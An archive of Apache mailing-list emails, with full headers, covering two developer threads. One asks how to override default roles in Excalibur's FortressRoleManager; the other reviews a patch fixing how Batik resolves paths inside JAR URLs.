161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO main.gmane.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Mon, 30 Aug 2004 19:11:23 -0700 Received: from root by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 1C1y77-00086I-00 for <[email protected]>; Tue, 31 Aug 2004 04:11:18 +0200 Received: from 161.129.204.104 ([161.129.204.104]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for <[email protected]>; Tue, 31 Aug 2004 04:11:13 +0200 Received: from yueming by 161.129.204.104 with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for <[email protected]>; Tue, 31 Aug 2004 04:11:13 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: [email protected] From: yueming <[email protected]> Subject: how replacce FortressRoleManager or remove role in FortressRoleManager Date: Tue, 31 Aug 2004 09:47:18 +0800 Lines: 3 Message-ID: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Complaints-To: [email protected] X-Gmane-NNTP-Posting-Host: 161.129.204.104 User-Agent: Mozilla Thunderbird 0.7.3 (Windows/20040803) X-Accept-Language: en-us, en Sender: news <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I don't want default roles to be defined like in but if t modify FortressRoleManager , if affect other funtion? --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] Apache Excalibur Project -- URL: http://excalibur.apache.org/ From [email protected] Tue Aug 31 14:32:09 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95946 invoked from network); 31 Aug 2004 14:32:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Aug 2004 14:32:09 -0000 Received: (qmail 69138 invoked by uid 500); 31 Aug 2004 14:31:57 -0000 Delivered-To: [email protected] Received: (qmail 69043 invoked by uid 500); 31 Aug 2004 14:31:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> List-Id: "Excalibur Users List" <user.excalibur.apache.org> Reply-To: "Excalibur Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 12669 invoked by uid 99); 31 Aug 2004 14:10:46 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) X-Provags-ID:perfora.net [email protected] 2bc767a67eb67084e86c67eb29290016 Message-ID: <[email protected]> Date: Tue, 31 Aug 2004 10:13:22 -0400 From: Berin Loritsch <[email protected]> Organization: D-Haven.org User-Agent: Mozilla Thunderbird 0.6 (Windows/20040502) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Excalibur Users List <[email protected]> Subject: Re: how replacce FortressRoleManager or remove role in FortressRoleManager References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N yueming wrote: > I don't want default roles to be defined like in > but if t modify FortressRoleManager , > if affect other funtion? Those default roles were put there to make it compatible with all the components in Excalibur at that time. It was designed so that if you didn't have those components installed it would not set those roles for you. However, as soon as they are in the classpath, they are automatically available without any work on your part. Since the RoleManagers are heirarchical, you can always override the FortressRoleManager definitions. The system always includes it at the bottom of the stack unless you provide your own to the FortressConfig class. Modifications to the FortressRoleManager (the hardcoded one) won't really affect anything. There is a configurable role manager and the meta managers that load the meta info from extra files in the class path. There should be plenty of options to do what you want. -- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." - Rich Cook --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] Apache Excalibur Project -- URL: http://excalibur.apache.org/
From [email protected] Mon Feb 03 19:19:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94740 invoked by uid 500); 3 Feb 2003 19:19:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94695 invoked from network); 3 Feb 2003 19:19:16 -0000 Message-ID: <[email protected]> Date: Mon, 03 Feb 2003 14:19:14 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: [Fwd: Problem with Batik source code] Content-Type: multipart/alternative; boundary="------------050605020506070600070306" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------050605020506070600070306 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit -------- Original Message -------- Subject: Problem with Batik source code Date: Mon, 03 Feb 2003 11:52:47 -0500 From: Keven Ring <[email protected]> To: [email protected] Tom: We are using batik to render a large (>2000) SVG image set. These images consist of references to other SVGs, for compositional purposes. We plan on distributing the SVGs in a jar file, due both to the large number of images, and because we plan on utilizing JNLP for distribution purposes. The images are grouped into categories and subcategories appropriately, with each category represented by a directory. When we originally developed the image set, we were rendering the icons as they resided on the filesystem, ie, not in a JAR file. As a result, the icons had relative path locations to the other SVG components. These relative paths often went up one or more directories, via the standard '..' notation. When we put the icons in a JAR file, the previous directory notation ['..'] no longer applied. We converted all of the references to use absolute paths from the context of the jar file itself. Thus, all xlink targets start with a 'root directory' notation, or '/'. None of the icons rendered appropriately in batik when we did this. We tracked it down to the way that the ParsedURLDefaultProtocolHandler constructed 'relative' URLs, specifically relating to jar files. Because it appeared that only jar files were affected, we made a change to the ParsedURLJarProtocolHandler. The patch for this file is attached. Specifically, the default protocol handler removed the jar file reference (ie, the in the syntax: jar:!) when a relative path was provided. We believe this to be incorrect, and instead, the should be replaced or appended to (depending on the absolute or relative nature of the path provided). For instance, if the original JAR url was: jar:/path/to/jar!/path/to/file and the new URL string is /newpath/to/different/file then the current code produces the following URL: jar:/newpath/to/different/file rather than jar:/path/to/jar!/newpath/to/different/file The same was true if a relative path was provided, thus a new URL string of additional/file would become jar:additional/file rather than jar:/path/to/jar!/path/to/additional/file For now, we are working with a modified batik 1.5b4. However, if this change (or a modification producing similar results) were incorporated into the baseline, it would be appreciated. If you have any questions, or would like the set (or subset) of images, please let me know. Thanks for you assistance with this matter. -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort --------------050605020506070600070306 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body> <br> <br> -------- Original Message -------- <table cellpadding="0" cellspacing="0" border="0"> <tbody> <tr> <th valign="baseline" align="right" nowrap="">Subject: </th> <td>Problem with Batik source code</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">Date: </th> <td>Mon, 03 Feb 2003 11:52:47 -0500</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">From: </th> <td>Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">To: </th> <td><a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a></td> </tr> </tbody> </table> <br> <br> <pre>Tom: We are using batik to render a large (&gt;2000) SVG image set. These images consist of references to other SVGs, for compositional purposes. We plan on distributing the SVGs in a jar file, due both to the large number of images, and because we plan on utilizing JNLP for distribution purposes. The images are grouped into categories and subcategories appropriately, with each category represented by a directory. When we originally developed the image set, we were rendering the icons as they resided on the filesystem, ie, not in a JAR file. As a result, the icons had relative path locations to the other SVG components. These relative paths often went up one or more directories, via the standard '..' notation. When we put the icons in a JAR file, the previous directory notation ['..'] no longer applied. We converted all of the references to use absolute paths from the context of the jar file itself. Thus, all xlink targets start with a 'root directory' notation, or '/'. None of the icons rendered appropriately in batik when we did this. We tracked it down to the way that the ParsedURLDefaultProtocolHandler constructed 'relative' URLs, specifically relating to jar files. Because it appeared that only jar files were affected, we made a change to the ParsedURLJarProtocolHandler. The patch for this file is attached. Specifically, the default protocol handler removed the jar file reference (ie, the <URL for="" jar="" file=""> in the syntax: jar:<URL for="" jar="" file="">!<path in="" jar="" file="">) when a relative path was provided. We believe this to be incorrect, and instead, the <path in="" jar="" file=""> should be replaced or appended to (depending on the absolute or relative nature of the path provided). For instance, if the original JAR url was: jar:/path/to/jar!/path/to/file and the new URL string is /newpath/to/different/file then the current code produces the following URL: jar:/newpath/to/different/file rather than jar:/path/to/jar!/newpath/to/different/file The same was true if a relative path was provided, thus a new URL string of additional/file would become jar:additional/file rather than jar:/path/to/jar!/path/to/additional/file For now, we are working with a modified batik 1.5b4. However, if this change (or a modification producing similar results) were incorporated into the baseline, it would be appreciated. If you have any questions, or would like the set (or subset) of images, please let me know. Thanks for you assistance with this matter. -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </path></path></URL></URL></pre> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> </body> </html> --------------050605020506070600070306-- From [email protected] Mon Feb 03 19:19:33 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95932 invoked by uid 500); 3 Feb 2003 19:19:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95897 invoked from network); 3 Feb 2003 19:19:32 -0000 Message-ID: <[email protected]> Date: Mon, 03 Feb 2003 14:19:30 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: batik-dev <[email protected]> Subject: [Fwd: RE: Problem with Batik source code] Content-Type: multipart/alternative; boundary="------------010009010807010408010704" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------010009010807010408010704 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit -------- Original Message -------- Subject: RE: Problem with Batik source code Date: Mon, 3 Feb 2003 13:27:00 -0500 From: Thomas E Deweese <[email protected]> To: Keven Ring <[email protected]> CC: [email protected] References: <[email protected]> Hi Keven, I would rather discuss this on batik-dev than off list, if possible. >>>>> "KR" == Keven Ring writes: KR> We are using batik to render a large (>2000) SVG image set. These KR> images consist of references to other SVGs, for compositional KR> purposes. We plan on distributing the SVGs in a jar file, due KR> both to the large number of images, and because we plan on KR> utilizing JNLP for distribution purposes. The images are grouped KR> into categories and subcategories appropriately, with each KR> category represented by a directory. Sounds cool. KR> When we originally developed the image set, we were rendering KR> the icons as they resided on the filesystem, ie, not in a JAR KR> file. As a result, the icons had relative path locations to the KR> other SVG components. These relative paths often went up one or KR> more directories, via the standard '..' notation. KR> When we put the icons in a JAR file, the previous directory KR> notation ['..'] no longer applied. Why? I'm under the impression that relative references should work within a JAR URL... KR> We converted all of the references to use absolute paths from the KR> context of the jar file itself. Thus, all xlink targets start KR> with a 'root directory' notation, or '/'. KR> None of the icons rendered appropriately in batik when we did KR> this. We tracked it down to the way that the KR> ParsedURLDefaultProtocolHandler constructed 'relative' URLs, KR> specifically relating to jar files. Because it appeared that only KR> jar files were affected, we made a change to the KR> ParsedURLJarProtocolHandler. The patch for this file is attached. Thanks, I'm more or less happy to accept a change (I have some comments on it below). I knew that I wasn't really handling the absolute case. KR> Specifically, the default protocol handler removed the jar file KR> reference (ie, the in the syntax: jar: jar file> !) when a relative path was provided. We file> believe KR> this to be incorrect, and instead, the should KR> be replaced or appended to (depending on the absolute or relative KR> nature of the path provided). Well I'm 99% certain that relative paths work just as you describe. There are a bunch of existing tests for this in the ParsedURL testSuite (see 'xml-batik/test-resources/org/apache/batik/util/unitTesting.xml' tests 'ParsedURL.15' -> 'ParsedURL.21'). Could you please provide additional tests for absolute JAR sub URL's? This will help ensure that you have covered all cases and that we don't break anything you are depending on in the future. In order to run regard (our test tool) you will need to do one of two things. 1) comment out the line: In 'xml-batik/test-resources/org/apache/batik/test/regard.xml'. 2) Get a copy of the SVG Working Groups BE test suite. and unpack it in the same directory as xml-batik (so beSuite is a sibling of xml-batik). Then to run the ParsedURL tests simply use: % build.sh regard ParsedURL --- Comments on the code: I'm a little disappointed with the use of java.net.URL here (as opposed to directly handling the absolute and relative cases), although I've most convinced myself that this doesn't introduce a significant compatability issue (given the data protocol URL requiremenst of SVG, java.net.URL makes me twichy :). As you seem to suspect I might, I really don't like the openStream call. Do you have a case that you expect to encounter here? If not I would rather drop it. Finally, you are better off using 'constructParsedURLData(url)' rather than calling 'parseURL(url.toExternalForm())'. + // It's relative so base it off baseURL + try { + java.net.URL context = new java.net.URL(baseURL.toString()); + java.net.URL url = new java.net.URL(context, urlStr); + // The following two lines simply verify that the URL is valid. + // Strictly speaking, they are not required, although it allows + // us to have a fallback position. + java.io.InputStream is = url.openStream(); + is.close(); + pd = parseURL(url.toExternalForm()); + } + catch (Exception e) { + pd = super.parseURL(baseURL, urlStr); + } -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort --------------010009010807010408010704 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body> <br> <br> -------- Original Message -------- <table cellpadding="0" cellspacing="0" border="0"> <tbody> <tr> <th valign="baseline" align="right" nowrap="">Subject: </th> <td>RE: Problem with Batik source code</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">Date: </th> <td>Mon, 3 Feb 2003 13:27:00 -0500</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">From: </th> <td>Thomas E Deweese <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">To: </th> <td>Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">CC: </th> <td><a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">References: </th> <td><a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> </tbody> </table> <br> <br> <pre>Hi Keven, I would rather discuss this on batik-dev than off list, if possible. &gt;&gt;&gt;&gt;&gt; "KR" == Keven Ring <keven @mitre.org=""> writes: KR&gt; We are using batik to render a large (&gt;2000) SVG image set. These KR&gt; images consist of references to other SVGs, for compositional KR&gt; purposes. We plan on distributing the SVGs in a jar file, due KR&gt; both to the large number of images, and because we plan on KR&gt; utilizing JNLP for distribution purposes. The images are grouped KR&gt; into categories and subcategories appropriately, with each KR&gt; category represented by a directory. Sounds cool. KR&gt; When we originally developed the image set, we were rendering KR&gt; the icons as they resided on the filesystem, ie, not in a JAR KR&gt; file. As a result, the icons had relative path locations to the KR&gt; other SVG components. These relative paths often went up one or KR&gt; more directories, via the standard '..' notation. KR&gt; When we put the icons in a JAR file, the previous directory KR&gt; notation ['..'] no longer applied. Why? I'm under the impression that relative references should work within a JAR URL... KR&gt; We converted all of the references to use absolute paths from the KR&gt; context of the jar file itself. Thus, all xlink targets start KR&gt; with a 'root directory' notation, or '/'. KR&gt; None of the icons rendered appropriately in batik when we did KR&gt; this. We tracked it down to the way that the KR&gt; ParsedURLDefaultProtocolHandler constructed 'relative' URLs, KR&gt; specifically relating to jar files. Because it appeared that only KR&gt; jar files were affected, we made a change to the KR&gt; ParsedURLJarProtocolHandler. The patch for this file is attached. Thanks, I'm more or less happy to accept a change (I have some comments on it below). I knew that I wasn't really handling the absolute case. KR&gt; Specifically, the default protocol handler removed the jar file KR&gt; reference (ie, the <URL for="" jar="" file=""> in the syntax: jar:<URL for="" kr=""> jar file&gt; !<path in="" jar="" file="">) when a relative path was provided. We file&gt; believe KR&gt; this to be incorrect, and instead, the <path in="" jar="" file=""> should KR&gt; be replaced or appended to (depending on the absolute or relative KR&gt; nature of the path provided). Well I'm 99% certain that relative paths work just as you describe. There are a bunch of existing tests for this in the ParsedURL testSuite (see 'xml-batik/test-resources/org/apache/batik/util/unitTesting.xml' tests 'ParsedURL.15' -&gt; 'ParsedURL.21'). Could you please provide additional tests for absolute JAR sub URL's? This will help ensure that you have covered all cases and that we don't break anything you are depending on in the future. In order to run regard (our test tool) you will need to do one of two things. 1) comment out the line: <testSuite href="file:test-resources/org/apache/batik/test/beSuite.xml"> In 'xml-batik/test-resources/org/apache/batik/test/regard.xml'. 2) Get a copy of the SVG Working Groups BE test suite. and unpack it in the same directory as xml-batik (so beSuite is a sibling of xml-batik). Then to run the ParsedURL tests simply use: % build.sh regard ParsedURL --- Comments on the code: I'm a little disappointed with the use of java.net.URL here (as opposed to directly handling the absolute and relative cases), although I've most convinced myself that this doesn't introduce a significant compatability issue (given the data protocol URL requiremenst of SVG, java.net.URL makes me twichy :). As you seem to suspect I might, I really don't like the openStream call. Do you have a case that you expect to encounter here? If not I would rather drop it. Finally, you are better off using 'constructParsedURLData(url)' rather than calling 'parseURL(url.toExternalForm())'. + // It's relative so base it off baseURL + try { + java.net.URL context = new java.net.URL(baseURL.toString()); + java.net.URL url = new java.net.URL(context, urlStr); + // The following two lines simply verify that the URL is valid. + // Strictly speaking, they are not required, although it allows + // us to have a fallback position. + java.io.InputStream is = url.openStream(); + is.close(); + pd = parseURL(url.toExternalForm()); + } + catch (Exception e) { + pd = super.parseURL(baseURL, urlStr); + } </testSuite></path></path></URL></URL></keven></pre> <br> <pre class="moz-signature" cols="$mailwrapcol">-- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort </pre> </body> </html> --------------010009010807010408010704-- From [email protected] Mon Feb 03 19:49:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63081 invoked by uid 500); 3 Feb 2003 19:49:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63070 invoked from network); 3 Feb 2003 19:49:18 -0000 Message-ID: <[email protected]> Date: Mon, 03 Feb 2003 14:49:08 -0500 From: Keven Ring <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: [Fwd: RE: Problem with Batik source code] References: <[email protected]> Content-Type: multipart/alternative; boundary="------------030506080304060603010209" X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N --------------030506080304060603010209 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit > > > -------- Original Message -------- > Subject: RE: Problem with Batik source code > Date: Mon, 3 Feb 2003 13:27:00 -0500 > From: Thomas E Deweese <[email protected]> > To: Keven Ring <[email protected]> > CC: [email protected] > References: <[email protected]> > > > >Hi Keven, > > I would rather discuss this on batik-dev than off list, if >possible. > >>>>>> "KR" == Keven Ring writes: > >KR> We are using batik to render a large (>2000) SVG image set. These >KR> images consist of references to other SVGs, for compositional >KR> purposes. We plan on distributing the SVGs in a jar file, due >KR> both to the large number of images, and because we plan on >KR> utilizing JNLP for distribution purposes. The images are grouped >KR> into categories and subcategories appropriately, with each >KR> category represented by a directory. > > Sounds cool. > >KR> When we originally developed the image set, we were rendering >KR> the icons as they resided on the filesystem, ie, not in a JAR >KR> file. As a result, the icons had relative path locations to the >KR> other SVG components. These relative paths often went up one or >KR> more directories, via the standard '..' notation. > >KR> When we put the icons in a JAR file, the previous directory >KR> notation ['..'] no longer applied. > > Why? I'm under the impression that relative references should >work within a JAR URL... > Sun's implementation of the JAR file specification does not support them, from what I can tell. Specifically, given a JAR file, and a file which exists in that JAR file, say /foo/bar.txt, one can look up the resource /foo/bar.txt, but not /foo/../foo/bar.txt. I suspect that the reason for this is that there is no entry in the JAR/ZIP file called /foo/../foo/bar.txt. > > >KR> We converted all of the references to use absolute paths from the >KR> context of the jar file itself. Thus, all xlink targets start >KR> with a 'root directory' notation, or '/'. > >KR> None of the icons rendered appropriately in batik when we did >KR> this. We tracked it down to the way that the >KR> ParsedURLDefaultProtocolHandler constructed 'relative' URLs, >KR> specifically relating to jar files. Because it appeared that only >KR> jar files were affected, we made a change to the >KR> ParsedURLJarProtocolHandler. The patch for this file is attached. > > Thanks, I'm more or less happy to accept a change (I have some >comments on it below). I knew that I wasn't really handling the >absolute case. > >KR> Specifically, the default protocol handler removed the jar file >KR> reference (ie, the in the syntax: jar: jar >file> !) when a relative path was provided. We >file> believe >KR> this to be incorrect, and instead, the should >KR> be replaced or appended to (depending on the absolute or relative >KR> nature of the path provided). > > Well I'm 99% certain that relative paths work just as you >describe. There are a bunch of existing tests for this in the >ParsedURL testSuite (see >'xml-batik/test-resources/org/apache/batik/util/unitTesting.xml' tests >'ParsedURL.15' -> 'ParsedURL.21'). > I will double check the problems that we had. I certainly could be wrong! > > Could you please provide additional tests for absolute JAR sub >URL's? This will help ensure that you have covered all cases and that >we don't break anything you are depending on in the future. > Sure. How would you like me to supply additional tests? Via this reflector? > > In order to run regard (our test tool) you will need to do >one of two things. > > 1) comment out the line: > > > > In 'xml-batik/test-resources/org/apache/batik/test/regard.xml'. > > 2) Get a copy of the SVG Working Groups BE test suite. and unpack > it in the same directory as xml-batik (so beSuite is a sibling > of xml-batik). > > Then to run the ParsedURL tests simply use: > > % build.sh regard ParsedURL > I'll let you know when I have the tests up and working. > >--- > >Comments on the code: > > I'm a little disappointed with the use of java.net.URL here (as >opposed to directly handling the absolute and relative cases), >although I've most convinced myself that this doesn't introduce a >significant compatability issue (given the data protocol URL >requiremenst of SVG, java.net.URL makes me twichy :). > I fully understand [ yes, I did read the javadoc comments regarding ParsedURL, and why it exists ]. However, I was in a bit of a dilema - I could parse it myself, and construct a suitable URI, but since the JAR URL specification is really Sun's specification, I would rather 'trust' their implementation of constructing a new JAR URL [irrespective of the type of URL being constructed, whether it is absolute, absolute in the same JAR, or relative in the same JAR] than attempting to write a [possibly poor] substitute, and at the same time, not have to worry about possible format specification changes by Sun. Because ParsedURL performs the same type of functionality as the java URL class, if ParsedURL was modified to support these three classes of modifications to an existing ParsedURL, then, I agree, it would be the cleanest approach. However, because other protocols require ParsedURL to operate correctly, I was hesitant to make the necessary modifications, somewhat due to the unwillingness (at the time) to fully understand what ParsedURL was doing in the plethora of cases. > > > As you seem to suspect I might, I really don't like the openStream >call. Do you have a case that you expect to encounter here? If not I >would rather drop it. > The case that I wanted to support, which, in the long run, isn't very important, is the ability to fall back to the original URL merging algorithm. Assuming that the overall issue is resolved, then the opening and closing of the resource is certainly superflous. > > Finally, you are better off using 'constructParsedURLData(url)' >rather than calling 'parseURL(url.toExternalForm())'. > Great! If there is a preferred/more efficient way of constructing a ParsedURL instance given a URL, then, by all means, make changes. My purpose for posting the original message, and the submitted change, was simply to identify an issue, and to provide a possible solution. The solution is based on my knowledge and understand of Batik, as well as the time available to investigate the matter. I welcome the inclusion, or modification of the solution, more to further extend the capabilities of the entire system. Hope this helps! > > >+ // It's relative so base it off baseURL >+ try { >+ java.net.URL context = new java.net.URL(baseURL.toString()); >+ java.net.URL url = new java.net.URL(context, urlStr); >+ // The following two lines simply verify that the URL is valid. >+ // Strictly speaking, they are not required, although it allows >+ // us to have a fallback position. >+ java.io.InputStream is = url.openStream(); >+ is.close(); >+ pd = parseURL(url.toExternalForm()); >+ } >+ catch (Exception e) { >+ pd = super.parseURL(baseURL, urlStr); >+ } > > >-- >Keven Ring | They called it Paradise, I don't know why >Lead Software Systems Engineer | When you call someplace Paradise >The MITRE Corporation | Kiss it goodbye.... >+1-623-992-4185 | The Eagles, The Last Resort > -- Keven Ring | They called it Paradise, I don't know why Lead Software Systems Engineer | When you call someplace Paradise The MITRE Corporation | Kiss it goodbye.... +1-623-992-4185 | The Eagles, The Last Resort --------------030506080304060603010209 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body> <br> <blockquote type="cite" cite="[email protected]"> <title></title> <br> <br> -------- Original Message -------- <table cellpadding="0" cellspacing="0" border="0"> <tbody> <tr> <th valign="baseline" align="right" nowrap="">Subject: </th> <td>RE: Problem with Batik source code</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">Date: </th> <td>Mon, 3 Feb 2003 13:27:00 -0500</td> </tr> <tr> <th valign="baseline" align="right" nowrap="">From: </th> <td>Thomas E Deweese <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">To: </th> <td>Keven Ring <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">CC: </th> <td><a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a></td> </tr> <tr> <th valign="baseline" align="right" nowrap="">References: </th> <td><a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a></td> </tr> </tbody> </table> <br> <br> <pre>Hi Keven, I would rather discuss this on batik-dev than off list, if possible. &gt;&gt;&gt;&gt;&gt; "KR" == Keven Ring <keven @mitre.org=""> writes: KR&gt; We are using batik to render a large (&gt;2000) SVG image set. These KR&gt; images consist of references to other SVGs, for compositional KR&gt; purposes. We plan on distributing the SVGs in a jar file, due KR&gt; both to the large number of images, and because we plan on KR&gt; utilizing JNLP for distribution purposes. The images are grouped KR&gt; into categories and subcategories appropriately, with each KR&gt; category represented by a directory. Sounds cool. KR&gt; When we originally developed the image set, we were rendering KR&gt; the icons as they resided on the filesystem, ie, not in a JAR KR&gt; file. As a result, the icons had relative path locations to the KR&gt; other SVG components. These relative paths often went up one or KR&gt; more directories, via the standard '..' notation. KR&gt; When we put the icons in a JAR file, the previous directory KR&gt; notation ['..'] no longer applied. Why? I'm under the impression that relative references should work within a JAR URL...</keven></pre> </blockquote> Sun's implementation of the JAR file specification does not support them, from what I can tell. &nbsp;Specifically, given a JAR file, and a file which exists in that JAR file, say <tt>/foo/bar.txt</tt>, &nbsp;one can look up the resource <tt>/foo/bar.txt</tt>, but not <tt>/foo/../foo/bar.txt</tt>. &nbsp;I suspect that the reason for this is that there is no entry in the JAR/ZIP file called <tt>/foo/../foo/bar.txt</tt>.<br> <br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""> KR&gt; We converted all of the references to use absolute paths from the KR&gt; context of the jar file itself. Thus, all xlink targets start KR&gt; with a 'root directory' notation, or '/'. KR&gt; None of the icons rendered appropriately in batik when we did KR&gt; this. We tracked it down to the way that the KR&gt; ParsedURLDefaultProtocolHandler constructed 'relative' URLs, KR&gt; specifically relating to jar files. Because it appeared that only KR&gt; jar files were affected, we made a change to the KR&gt; ParsedURLJarProtocolHandler. The patch for this file is attached. Thanks, I'm more or less happy to accept a change (I have some comments on it below). I knew that I wasn't really handling the absolute case. KR&gt; Specifically, the default protocol handler removed the jar file KR&gt; reference (ie, the <URL for="" jar="" file=""> in the syntax: jar:<URL for="" kr=""> jar file&gt; !<path in="" jar="" file="">) when a relative path was provided. We file&gt; believe KR&gt; this to be incorrect, and instead, the <path in="" jar="" file=""> should KR&gt; be replaced or appended to (depending on the absolute or relative KR&gt; nature of the path provided). Well I'm 99% certain that relative paths work just as you describe. There are a bunch of existing tests for this in the ParsedURL testSuite (see 'xml-batik/test-resources/org/apache/batik/util/unitTesting.xml' tests 'ParsedURL.15' -&gt; 'ParsedURL.21'). </path></path></URL></URL></keven></pre> </blockquote> I will double check the problems that we had. &nbsp;I certainly could be wrong!<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""> Could you please provide additional tests for absolute JAR sub URL's? This will help ensure that you have covered all cases and that we don't break anything you are depending on in the future. </path></path></URL></URL></keven></pre> </blockquote> Sure. &nbsp;How would you like me to supply additional tests? &nbsp;Via this reflector?<br> <blockquote type="cite" cite="[email protected]"> <pre><keven @mitre.org=""><URL for="" jar="" file=""><URL for="" kr=""><path in="" jar="" file=""><path in="" jar="" file=""> 